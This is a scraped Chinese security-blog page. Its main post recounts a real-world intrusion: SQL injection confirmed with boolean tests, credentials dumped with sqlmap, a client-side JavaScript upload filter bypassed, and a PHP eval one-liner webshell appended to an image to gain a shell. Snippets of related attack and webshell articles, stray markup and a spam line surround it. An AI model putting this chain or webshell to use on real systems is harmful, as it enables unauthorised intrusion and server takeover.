<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    記錄一次實戰,注入+本地JS繞過拿shell

    一顆小胡椒2023-05-04 08:50:50

    01 正文

    1.找注入點

    2.測試是否有注入:


    http://xxxxxx/xxxx.php?id=6’ ,沒有回顯
    


    輸入:http://xxxxxx/xxxx.php?id=6 and 1=1 有回顯,and 1 = 2沒有回顯,說明存在注入。

    3. 使用sqlmap跑。


    sqlmap.py -u “http://xxxxx/xxxx.php?id=6”
    

    發現有注入,然后使用–dbs,–tables,–columns,–dump找出用戶名和密碼。

    4.使用御劍掃描后臺。然后進行登錄。

    我們先上傳一個腳本木馬試試。

    發現有黑名單。先看下是否是本地js校驗。右鍵審查元素,發現是本地js校驗。

    我們找到表單form,刪除相對應的腳本。

    5.重新上傳php一句話,發現

    那么試下圖片馬

    6.將圖片使用C32Asm打開,在最后面添加一句話:<?php @ eval ( $_POST [ 'pw' ]); ?>

    保存,命名為a.php。然后上傳,發現上傳成功,使用菜刀連接,密碼pw。

    js
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    JShell是一個使用XSS獲取JavaScript shell的腳本,基于python。
    jsproxy功能特點服務端開銷低傳統在線代理幾乎都是在服務端替換 HTML/JS/CSS 等資源中的 URL。它能讓 JS 攔截網頁產生的請求,并能自定義返回內容,相當于在瀏覽器內部實現一個反向代理。API 虛擬化傳統在線代理大多只針對靜態 URL 的替換,忽視了動態 URL 以及和 URL 相關的網頁 API。這可能導致某些業務邏輯出現問題。同時得益于 nginx 豐富的功能,很多常用需求無需重新造輪子,通過簡單配置即可實現。并且無論性能還是穩定性,都遠高于自己實現。
    JSON 是我們日常寫代碼要看的最多的數據了,服務之間的接口交互幾乎都使用 JSON 格式的數據,而一個能夠對 JSON 比較好可視化,并直觀的去查看數據的工具非常重要。之前我一般是在 Chrome 安裝 JSON 解析的插件工具,而今天要推薦的工具就要更強一點了。JSON Visio,一款能夠直接將 JSON 渲染成可交互的圖形化工具,通過樹形結構的形式可以很直觀的看到數據的內在邏輯。更多項目詳情請查看如下鏈接。
    查看tomcat中間件的\work\Catalina\localhost_\org\apache\jsp 目錄,仍然是可以發現這個shell的編譯過程中產生的幾個文件的,這3個文件攻擊者一般不會刪除,也不會更改文件的時間屬性。
    JSON注入入門
    2022-04-18 15:09:05
    泛星安全團隊泛星安全團隊第8篇文章聲明文章內容為學習記錄,請勿利用文章內的相關技術從事非法測試,如因此產生的
    它們基于JSON格式,并包含一個令牌簽名以確保令牌的完整性。本文主要討論使用JSON Web令牌的安全隱患,以及攻擊者如何利用它們繞過訪問控制。有效載荷和簽名。
    JS未授權訪問漏洞
    2021-12-20 15:09:49
    參加了最近一期的聽火沙龍,各位師傅分享了很多有意思的挖洞姿勢和議題,根據會后梳理和完善,現以分享交流未授權的一些拙見,各位大師父們如果有更好的意見建議,歡迎評論交流。 第一次訪問站點,需要注意多收集接口(多做信息收集),把站點能點的按鈕先觸發一邊,可配合利用谷歌插件FindSomething或BurpJSLinkFinder插件做一些被動接口收集,我習慣用BurpJSLinkFinder。
    JSP Webshell的檢測工具
    2021-12-13 12:04:53
    在11月初,我做了一些JSP Webshell的免殺研究,主要參考了三夢師傅開源的代碼。然后加入了一些代碼混淆手段,編寫了一個免殺馬生成器JSPHorse,沒想到在Github上已收獲500+的Star
    JSP內存馬研究
    2021-10-16 07:49:21
    最近在研究webshell免殺的問題,到了內存馬免殺部分發現傳統的Filter或者Servlet查殺手段比較多,不太容易實現免殺,比如有些工具會將所有注冊的Servlet和Filter拿出來,排查人員仔細一點還是會被查出來的,所以 我們要找一些其他方式實現的內存馬。比如我今天提到的JSP的內存馬(雖然本質上也是一種Servlet類型的馬) 。
    此類問題主要存在于后臺登陸頁面以及類似網頁內引入的JS文件中。根據此類漏洞,說不定登陸頁面下引入的js文件暴露的后臺路徑會成為突破口。因為此類問題利用方式和造成的危害與即將談論到的第三類問題不同,所以把這類問題單獨拿出來講一講。部分廠商更是因此降低了對XSS的評級。
    一顆小胡椒
    暫無描述
      亚洲 欧美 自拍 唯美 另类